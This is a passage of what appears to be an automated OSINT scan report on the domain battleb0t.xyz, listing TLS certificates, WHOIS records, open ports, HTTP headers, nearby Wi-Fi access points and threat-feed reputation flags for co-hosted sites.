60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:46:f1:1e:e1:9f:06:66:b4:a8:76:85:82:4c:61:2f:de:37:
70:5e:a3:ab:ce:31:a5:e4:63:10:5d:02:f9:ef:bd:c4:11:85:
80:6c:fc:c5:84:b0:c5:6b:a0:c4:07:ac:78:f3:1f:48:7e:f7:
86:c2:2f:cf:18:f5:92:dd:9a:51:6a:86:ae:51:1d:75:24:9f:
d6:b2:e6:73:f5:1b:4b:e1:d9:79:e3:8c:6d:d9:f5:09:8b:04:
13:69:59:dc:c2:b8:16:59:fc:4b:dd:d4:70:53:86:d9:46:1f:
4d:75:2f:f5:5d:24:f4:03:69:e5:72:06:59:2d:70:8b:88:1b:
c1:6e:20:f4:5c:2c:e2:e1:c4:72:50:4a:c0:18:b3:d8:69:e9:
db:ae:5d:67:ee:07:2b:bd:14:58:30:61:50:1a:c8:bf:41:ea:
16:f9:d3:c8:60:89:41:8f:2e:74:af:3d:af:75:1d:3b:a1:aa:
eb:1e:d5:15:4a:21:6f:8c:e6:17:0c:be:34:82:b6:75:05:7b:
8e:d6:da:74:1c:32:3b:c5:5e:fc:60:88:85:77:b4:ca:57:ff:
3c:36:de:a9:4f:dc:93:d8:f4:d4:75:d4:5f:6c:78:5c:f7:cb:
36:fe:04:b5:16:3b:bd:9f:a9:99:de:01:fa:7f:2c:28:60:7e:
4a:61:2b:70
|
| 2023-05-12 03:43:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 87.248.157.79:443 | 87.248.157.0/24 |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000yesnt.github.io]
https://www.openphish.com/feed.txt | 000yesnt.github.io |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Houzz (Category: hobby)
https://www.houzz.com/user/login | login |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6dgs (Net ID: 00:06:B1:28:66:65) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:33:59 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | IDATx
? `sm
b"0N9
3@N:vn
yj4BZu:-
pqmVU
hEC0s
c@ h'
6FcPkh4
2:Eu`
IDAT
nfwPH
jniEDkf
9uCGxN
MWFGv
'!hXQf
6WoW'
hRoWW
68ZQ$
8Ro7Tr
2j3yrN
nkumI'N
rVKjW
icsI3
dc:YL
JU5sF
O::vH
BlH_0
xHnU6
:9sGc
LB7R1
\T.sL
T.TM`
/kyyE
NjttD
Z \$@
_495P
trtT'cq
yf4:6
5?O@nY
.LRMj9o
dx.>_
"P/9l
1i5b>
d<'uj
JG077/
4NmT4 2
2d9L
B?mju
VWom
<F0b-R
PMc7d6d?
Z`sX10
tXB0Zn
blFM!
FpL3K
0o!Sc
6DfD0
IDATG`
D2Yi2e
wgxsu.
sx<C3
P?AF5
N1dcyzL
6dT\D
xTPT'
" mE\
DpW-Q
8NZeS
SIc@x
oJj'sN??
``xvl
BR8Jtu
waVm'
8 Jkd
55j1T
i5Vn
heH_>
yy60A
j1ENS
uHcBj
VCAKa
v-v7i
T/T.lF
IDAT>
5zqxE?
dUJ77
8_seE
"gJs5UxZ
p9Rn:
f2`q?
r4SvF
05sFG-
7mecE
`tNP6
><HQT
s9v54
!c>0
MRmC"
Pp@e9_ | https://funny.battleb0t.xyz/images/ein_2.png |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:A4:B5:6C) | 50.8897, 6.0563 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Piekielni (Category: misc)
https://piekielni.pl/user/login | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | FUNK-STEDE (Net ID: 00:02:2D:3D:3E:AD) | 50.1188, 8.6843 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BeensGroep (Net ID: 00:01:21:1F:B1:A0) | 52.3759, 4.8975 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [010pixel.github.io]
https://www.openphish.com/feed.txt | 010pixel.github.io |
| 2023-05-12 03:23:38 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.14:8443 | 188.114.96.0/24 |
| 2023-05-12 02:44:23 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.109.153 |
| 2023-05-12 02:47:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 104.196.30.220:443 | 104.196.30.220 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpaceStation (Net ID: 00:02:2D:01:CF:F8) | 37.780462,-122.390564 |
| 2023-05-12 02:53:49 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8000::153:443 | 2606:50c0:8000::153 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo8BDDE0 (Net ID: 00:0C:F6:8B:DD:E0) | 50.8897, 6.0563 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.128 | 34.148.97.127 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ea2e0298c1146-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 02:54:15 | HTTP Headers | No | Web Spider | 6 | 0 | 2 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} | nwapi2.battleb0t.xyz |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | westabuse@gmail.com | Domain Name: AYU.XYZ
Registry Domain ID: D9607467-CNIC
Registrar WHOIS Server: whois.west.cn
Registrar URL: http://www.west.cn
Updated Date: 2023-02-11T09:04:01.0Z
Creation Date: 2015-08-20T20:34:37.0Z
Registry Expiry Date: 2023-08-20T23:59:59.0Z
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Registrar IANA ID: 1556
Domain Status: ok https://icann.org/epp#ok
Registrant Organization:
Registrant State/Province: Jiang Su
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS5.MYHOSTADMIN.NET
Name Server: NS6.MYHOSTADMIN.NET
Name Server: NS1.MYHOSTADMIN.NET
Name Server: NS2.MYHOSTADMIN.NET
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@west.cn
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayu.xyz
Registry Domain ID: xy74494296952501
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2015-08-20T20:34:39.0Z
Creation Date: 2015-08-20T20:34:39.0Z
Registrar Registration Expiration Date: 2023-08-20T20:34:39.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Jiang Su
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=ayu.xyz
Name Server: ns1.myhostadmin.net
Name Server: ns2.myhostadmin.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: westabuse@gmail.com
Registrar Abuse Contact Phone: +86.2862778877
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:17:35.0Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
|
| 2023-05-12 02:53:39 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.108.0/24 | 185.199.108.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | AP Checkpoint (Net ID: 00:02:6F:B8:A2:4E) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:51:07 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 23 21:32:58.351 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F9:02:68:04:DD:BD:03:2E:AE:18:AA:
AF:0D:3B:37:54:0B:65:42:08:02:43:59:39:EA:4E:E4:
74:9E:81:C9:7F:02:21:00:A3:06:40:AE:98:69:3E:CB:
1F:F6:11:FA:78:DC:13:53:6B:E1:77:75:9F:C2:16:A0:
DB:C3:04:86:97:E4:3C:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 23 21:32:58.367 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:7A:A2:EB:6D:CE:11:7A:04:E7:47:C4:C2:
44:9A:BB:45:2B:47:3C:26:06:C5:A4:73:04:05:59:C0:
EA:D7:C9:86:02:21:00:96:12:0C:16:C7:15:09:8E:8E:
23:55:5D:FF:D3:4D:29:B3:21:12:6C:94:18:E0:30:4E:
4A:D0:D6:81:62:80:25
Signature Algorithm: sha256WithRSAEncryption
54:a4:7f:41:90:b7:5a:58:4b:b5:6b:68:ea:db:5a:92:b3:b2:
5b:7b:19:af:8a:ab:f1:af:c0:c8:97:4c:34:bf:3f:32:11:7b:
ef:8b:7e:76:7a:87:16:2c:1f:d0:41:d1:c1:02:b1:37:57:af:
4c:2b:b8:7b:75:a1:66:6d:db:db:ab:82:a1:fd:0c:b1:09:1f:
f6:3b:6f:e4:40:6a:6c:5b:ef:1d:46:ef:b3:b7:e2:09:40:10:
a0:d1:48:3e:99:ab:85:a3:c4:4c:9c:38:4c:86:5d:05:6c:1b:
02:ea:8a:b9:cd:33:f5:2b:4f:92:81:81:2f:e1:d6:b3:a5:e1:
b8:f6:e8:c6:e4:af:f3:a4:96:e9:02:f8:de:c5:31:3b:03:6b:
a3:c1:43:ea:01:84:7b:d7:65:c2:7b:26:5b:45:8b:c9:00:4a:
bf:64:80:db:bc:e4:35:f5:31:8b:1a:49:c1:a9:b6:8d:8f:59:
62:4e:f9:b9:59:d2:7d:9b:3a:75:2f:82:0e:77:1f:fa:cc:3b:
4e:90:c2:ba:e9:1d:4c:b0:a0:53:8e:4b:72:4b:e7:12:e4:36:
5a:97:fc:6e:97:fc:a5:f5:76:de:6f:cd:f5:6d:3f:07:f6:75:
e6:97:55:45:a3:14:55:0c:ff:89:33:2c:76:5f:49:b1:2d:bb:
1e:69:4c:4d
| battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan51 (Net ID: 00:02:6F:09:B2:F7) | 37.7642, -122.3993 |
| 2023-05-12 02:59:47 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | battleb0t.xyz@regprivate.ru | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys-g (Net ID: 00:0C:41:14:DD:46) | 39.0469, -77.4903 |
| 2023-05-12 03:33:11 | Malicious IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [185.199.111.153]
https://www.virustotal.com/en/ip-address/185.199.111.153/information/ | 185.199.111.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | TB Proprietary Channel. 01 (Net ID: 00:04:32:38:A1:09) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:49 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 64.226.81.43:443 | 64.226.81.43 |
| 2023-05-12 02:53:42 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-12T01:22:57.156Z", "ip": "185.199.109.153", "location_updated_at": "2023-05-05T05:03:49.200600Z", "autonomous_system_updated_at": "2023-05-02T12:54:55.346102Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"seanbalakhanei.me": {"record_type": "A", "resolved_at": "2023-03-04T17:11:48.378304297Z"}, "docs.c-labs.com": {"record_type": "CNAME", "resolved_at": "2023-03-17T13:39:25.912117315Z"}, "recipe-book.net": {"record_type": "A", "resolved_at": "2023-04-28T21:03:13.982663466Z"}, "www.gmacd.net": {"record_type": "CNAME", "resolved_at": "2023-04-11T20:22:42.495209956Z"}, "vivovagas.github.io": {"record_type": "A", "resolved_at": "2023-02-28T16:27:22.626388076Z"}, "viameumie.ivankz.com": {"record_type": "CNAME", "resolved_at": "2023-02-20T14:18:59.794160299Z"}, "dev.nim579.ru": {"record_type": "CNAME", "resolved_at": "2023-03-14T03:44:39.256076367Z"}, "rowanmanning.com": {"record_type": "A", "resolved_at": "2023-03-16T14:14:04.579032272Z"}, "www.wise.fitness": {"record_type": "CNAME", "resolved_at": "2023-04-26T17:59:27.361118834Z"}, "agorakube.ilkilabs.io": {"record_type": "CNAME", "resolved_at": "2023-02-25T17:02:31.257299756Z"}, "hexo.mistyrainq.site": {"record_type": "CNAME", "resolved_at": "2023-02-27T19:12:00.083016296Z"}, "tygospanhoff.nl": {"record_type": "A", "resolved_at": "2023-03-17T18:48:07.760584370Z"}, "www.cosmoamautas.org": {"record_type": "CNAME", "resolved_at": "2023-03-05T19:14:19.547803721Z"}, "njuics.cn": {"record_type": "CNAME", "resolved_at": "2023-03-22T10:17:45.580207010Z"}, "fanschou.github.io": {"record_type": "A", "resolved_at": "2023-03-20T01:52:09.688479139Z"}, "meth.supplies": {"record_type": "A", "resolved_at": "2023-03-04T19:36:17.924857492Z"}, "neophyte.cf": {"record_type": "A", "resolved_at": "2023-05-02T19:50:08.874674432Z"}, "hollisis.me": {"record_type": "A", "resolved_at": "2023-04-05T18:19:59.923721676Z"}, "dev.baicom.com": {"record_type": "CNAME", "resolved_at": "2023-05-03T13:55:02.514462461Z"}, "www.jordancox.me": {"record_type": "CNAME", "resolved_at": "2023-02-25T17:36:05.584035257Z"}, "devxchange.io": {"record_type": "A", "resolved_at": "2023-03-07T16:15:10.934357942Z"}, "clockwork189.uwdbc.com": {"record_type": "A", "resolved_at": "2023-03-01T15:32:36.493936266Z"}, "www.2briley.com": {"record_type": "CNAME", "resolved_at": "2023-04-28T13:20:47.065260373Z"}, 